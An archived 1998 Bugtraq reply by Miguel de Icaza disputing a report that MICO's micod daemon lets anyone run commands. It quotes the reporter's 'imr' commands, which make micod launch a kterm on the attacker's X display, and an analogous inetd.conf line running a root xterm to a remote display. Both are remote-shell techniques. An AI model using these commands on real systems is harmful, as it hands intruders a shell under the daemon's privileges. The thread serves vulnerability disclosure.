[6731] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: MICO: security problem: Privileges of micod for everybody!

daemon@ATHENA.MIT.EDU (Miguel de Icaza)
Sun May 10 20:29:52 1998

Date: 	Sun, 10 May 1998 17:10:30 -0500
Reply-To: Miguel de Icaza <miguel@NUCLECU.UNAM.MX>
From: Miguel de Icaza <miguel@NUCLECU.UNAM.MX>
X-To:         dominique@UNRUH.DE
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <355581A9.BA8F00CB@unruh.de> (message from Dominique Unruh on
              Sun, 10 May 1998 12:30:01 +0200)

> (micod ist started on inet:winkelklinke.local:8888)
> (hacking from enfin.local, which has X on display :0)
>
> imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared
> "kterm -display enfin.local:0 & echo" IDL:Anything:1.0
> imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play

I would not consider this an explot, I would consider this just not
understanding what you are doing.

This `exploit' is equivalent to putting in your /etc/inetd.conf:

service stream tcp nowait root /usr/X11R6/bin/xterm -display somehost:0

Users of MICO need to implement their own authentication systems
(which we do, for those who care about the panel).

Best wishes,
Miguel.


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[6731] in bugtraq

Re: MICO: security problem: Privileges of micod for everybody!

daemon@ATHENA.MIT.EDU (Miguel de Icaza)Sun May 10 20:29:52 1998

daemon@ATHENA.MIT.EDU (Miguel de Icaza)
Sun May 10 20:29:52 1998